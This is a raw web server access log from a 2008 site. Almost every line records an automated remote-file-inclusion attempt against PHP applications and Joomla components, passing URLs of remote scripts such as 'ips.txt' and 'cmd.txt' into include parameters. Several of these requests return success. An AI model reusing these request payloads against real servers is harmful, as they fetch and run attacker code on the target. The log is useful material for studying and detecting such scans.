206.74.10.235 - - [29/Jul/2008:09:56:18 -0700] "GET /work HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
65.98.70.18 - - [29/Jul/2008:09:56:25 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [29/Jul/2008:09:56:25 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:09:56:42 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:09:56:44 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:09:56:45 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:09:56:53 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:09:56:54 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:09:56:56 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:56:58 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:56:58 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:09:57:13 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://grupo.e-sportv.com/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:09:57:17 -0700] "GET /logs/access_080301.log//components/com_flyspray/startdown.php?file=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.0.228.184 - - [29/Jul/2008:09:57:29 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.0.228.184 - - [29/Jul/2008:09:57:30 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:57:33 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:57:36 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.217.242.2 - - [29/Jul/2008:09:57:39 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:09:57:48 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:09:57:48 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:09:57:49 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:57:52 -0700] "GET /errors.php?error=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:57:52 -0700] "GET /logs/errors.php?error=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:57:54 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:57:54 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:57:54 -0700] "GET /phphtml.php?htmlclass_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:57:54 -0700] "GET /phphtml.php?htmlclass_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:57:54 -0700] "GET /logs/phphtml.php?htmlclass_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:57:54 -0700] "GET /logs/phphtml.php?htmlclass_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:09:57:57 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:09:57:57 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:09:57:57 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:58:08 -0700] "GET /errors.php?error=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:58:08 -0700] "GET /logs/errors.php?error=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:58:14 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:58:16 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:58:25 -0700] "GET /logs/access_080225.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:58:28 -0700] "GET /index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:09:58:30 -0700] "GET /lostpasswd.php?env[include_prefix]=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:58:31 -0700] "GET /logs/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.50.0.218 - - [29/Jul/2008:09:58:35 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [29/Jul/2008:09:58:35 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:09:58:51 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:09:58:51 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:09:59:11 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://grupo.e-sportv.com/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:09:59:13 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:09:59:14 -0700] "GET /errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:09:59:18 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:09:59:18 -0700] "GET /errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:09:59:19 -0700] "GET /logs/errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.20.138.101 - - [29/Jul/2008:09:59:41 -0700] "GET /logs/access_080117.log/index.php?body=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:09:59:43 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:09:59:44 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:09:59:45 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.6.242 - - [29/Jul/2008:09:59:47 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.138.101 - - [29/Jul/2008:09:59:49 -0700] "GET /logs/index.php?body=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.6.242 - - [29/Jul/2008:09:59:51 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/bajo.txt????? HTTP/1.1" 200 3694 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.6.242 - - [29/Jul/2008:09:59:51 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.138.101 - - [29/Jul/2008:09:59:53 -0700] "GET /index.php?body=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 200 18427 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:09:59:54 -0700] "GET /logs/access_080315.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:09:59:54 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.20 - - [29/Jul/2008:09:59:57 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:10:00:03 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:10:00:04 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:10:00:15 -0700] "GET /logs/access_080315.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:10:00:15 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:10:00:15 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:10:00:16 -0700] "GET /logs/access_080207.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:10:00:26 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.810" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:00:28 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:00:29 -0700] "GET /errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:00:30 -0700] "GET /logs/errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:00:36 -0700] "GET /logs/access_080225.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:00:39 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:00:39 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:00:39 -0700] "GET /index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:00:40 -0700] "GET /logs/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:10:00:48 -0700] "GET /logs/access_080207.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:00:55 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:00:56 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:10:01:00 -0700] "GET /logs/access_080315.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://grupo.e-sportv.com/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:10:01:00 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://grupo.e-sportv.com/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:10:01:00 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://grupo.e-sportv.com/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:01:02 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:10:01:02 -0700] "GET /logs//extensions/moblog/moblog_lib.php?basedir=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:10:01:03 -0700] "GET //extensions/moblog/moblog_lib.php?basedir=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:01:05 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:01:05 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:10:01:13 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:10:01:13 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:10:01:13 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [29/Jul/2008:10:01:17 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:01:28 -0700] "GET /errors.php?error=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:10:01:51 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:10:01:51 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:10:01:53 -0700] "GET /logs/access_080207.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://grupo.e-sportv.com/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:02:03 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:02:06 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:02:07 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:10:02:08 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:02:09 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:02:14 -0700] "GET /phphtml.php?htmlclass_path=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
12.196.98.16 - - [29/Jul/2008:10:02:39 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
12.196.98.16 - - [29/Jul/2008:10:02:39 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
12.196.98.16 - - [29/Jul/2008:10:02:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
12.196.98.16 - - [29/Jul/2008:10:02:40 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:10:02:41 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:02:46 -0700] "GET /errors.php?error=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:02:51 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:02:54 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:03:06 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:03:07 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:03:17 -0700] "GET /logs/access_080528.log/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:03:17 -0700] "GET /logs/access_080528.log/join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:03:17 -0700] "GET /join.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
